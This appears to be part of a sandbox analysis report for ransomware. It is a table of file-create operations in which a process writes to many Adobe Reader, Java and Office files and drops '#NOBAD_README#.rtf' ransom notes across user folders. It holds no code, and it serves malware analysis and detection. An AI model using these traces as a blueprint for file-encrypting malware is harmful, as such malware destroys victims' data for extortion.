| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\edit_pdf_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\scan_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\ffjcext.zip | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_18DFC06EA5F8FC78.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
2 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\jjs.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\zipfs.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\rmiregistry.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_MoveNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\logging.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\psfontj2d.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\PDIALOG.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunjce_provider.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\US_export_policy.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Music.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Compare_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Measure.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Shorthand.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaBrightRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CPDF_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\guUrR gg1Rqh3UAZ5v.pdf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\organize_poster.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jfxswt.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Spelling.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\OptimizePDF_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\combine_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\net.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\java.security | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME-JAVAFX.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themes\dark\protect_poster2x.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\calendars.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Locale\en_US\stopwords.ENU | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_zh_HK.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\tesselate.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\jaccess.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\flavormap.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\LICENSE.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaTypewriterRegular.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Pictures\ph4FbxSYkvNgOdef0l1h\hZ7p_lTS0ptPK\VbgjHaG\KAyms-4e.jpg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Google\Chrome\User Data\Default\databases\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DigSig.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_initiator.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\javacpl.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\en-US\msoeres.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Portable Devices\publisherfunnydownloaded.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Edit_R_Full.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Mozilla\Firefox\Profiles\8i341t8m.default\OfflineCache\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\en-US\Journal.exe.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Journal\Templates\Graph.jtp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Mail\wab.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\CollectSignatures.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\bin\pack200.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\COPYRIGHT | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\cmm\sRGB.pf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\deploy\messages_pt_BR.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\access-bridge-64.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\javafx.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\management\jmxremote.access | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SendMail.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\ext\sunmscapi.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Accessibility.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\fonts\LucidaSansDemiBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\AppData\Roaming\Mozilla\Firefox\Profiles\8i341t8m.default\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\resources.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Protect_R_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\EPDF_RHP.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Stamp.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\pdf.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\DVA.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\elog_18DFC06EA5F8FC78.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\images\cursors\win32_LinkNoDrop32x32.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\jsse.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\StorageConnectors.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\ended_review_or_form.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_lg.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\turnOnNotificationInTray.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\adobe_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\core_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\plugin.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\themes\dark\aic_file_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Documents\aPwNhHugjJF9UGw\iMSNcoQ2TST\X7RlsIgbCQ w\#NOBAD_README#.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\server_issue.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\sound.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\lib\security\javaws.policy | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\manifest.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\email_all.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\AcroForm.api | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_131\THIRDPARTYLICENSEREADME.txt | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
